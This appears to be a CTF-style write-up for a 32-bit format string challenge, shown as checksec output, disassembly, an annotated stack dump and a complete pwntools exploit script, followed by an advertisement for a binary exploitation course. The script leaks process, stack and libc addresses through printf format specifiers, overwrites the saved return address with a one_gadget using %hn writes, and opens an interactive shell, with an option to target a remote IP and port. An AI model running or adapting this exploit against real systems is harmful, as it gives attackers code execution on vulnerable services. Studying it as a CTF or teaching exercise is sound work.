Arch: i386-32-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled
.text:5662B933 sub esp, 8 .text:5662B936 push 18h .text:5662B938 lea eax, (echo - 5662CFB0h)[ebx] ; "" .text:5662B93E push eax .text:5662B93F call read_input .text:5662B944 add esp, 10h .text:5662B947 sub esp, 0Ch .text:5662B94A lea eax, (echo - 5662CFB0h)[ebx] ; "" .text:5662B950 push eax ; format .text:5662B951 call _printf .text:5662B956 add esp, 10h
FFD5F0C0 5664300C .bss:echo FFD5F0C4 00000018 %1$x FFD5F0C8 00000004 FFD5F0CC 566418F3 %3$x, main+6D FFD5F0D0 00000001 FFD5F0D4 FFD5F194 %5$x FFD5F0D8 FFD50A31 FFD5F0DC 36B20200 STACK_COOKIE FFD5F0E0 FFD5F100 %8$x, SAVED_ECX FFD5F0E4 00000000 SAVED_EBX FFD5F0E8 00000000 SAVED_EBP FFD5F0EC F7D75637 %11$x, __libc_start_main+F7 ... FFD5F0FC F7D75637 RET ... FFD5F194 FFD6128A %53$x .text:56630985 lea esp, [ebp-8] .text:56630988 pop ecx .text:56630989 pop ebx .text:5663098A pop ebp .text:5663098B lea esp, [ecx-4] .text:5663098E retn .text:5663098E main endp
from pwn import * target_file = './format' context.log_level = 'error' context.binary = target_file if args['REMOTE']: libc_path = './libc-2.23.so' else: libc_path = '/lib/i386-linux-gnu/libc.so.6' libc = ELF(libc_path) def get_io(): if args['REMOTE']: io = remote('152.136.18.34', 9999) elif args['IDA']: io = process([ './linux_server' ]) else: io = process([ target_file ]) return io def x_input(io, s): io.sendlineafter('Choice:', '1') io.sendlineafter('say:', s) return io.recvline(keepends=False) def x_exit(io): io.sendlineafter('Choice:', '2') return def test(): io = get_io() s = x_input(io, '%3$x,%8$x,%11$x').split(',') process_base = int(s[0], 16) - 0x8F3 saved_ecx = int(s[1], 16) ret_stack_addr = saved_ecx - 4 libc_base = int(s[2], 16) - (libc.symbols['__libc_start_main'] + 0xF7) print('process_base: %x' % process_base) print('ret_stack_addr: %x' % ret_stack_addr) print('lib_base: %x' % libc_base) if args['REMOTE']: one_gadget = libc_base + 0x5f065 else: one_gadget = libc_base + 0x5fbc5 x_input(io, '%%%dc%%%d$hn' % (ret_stack_addr & 0xFFFF, 5)) x_input(io, '%%%dc%%%d$hn' % (one_gadget & 0xFFFF, 53)) x_input(io, '%%%dc%%%d$hn' % ((ret_stack_addr + 2) & 0xFFFF, 5)) x_input(io, '%%%dc%%%d$hn' % (one_gadget >> 16, 53)) x_exit(io) io.interactive() return test()
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。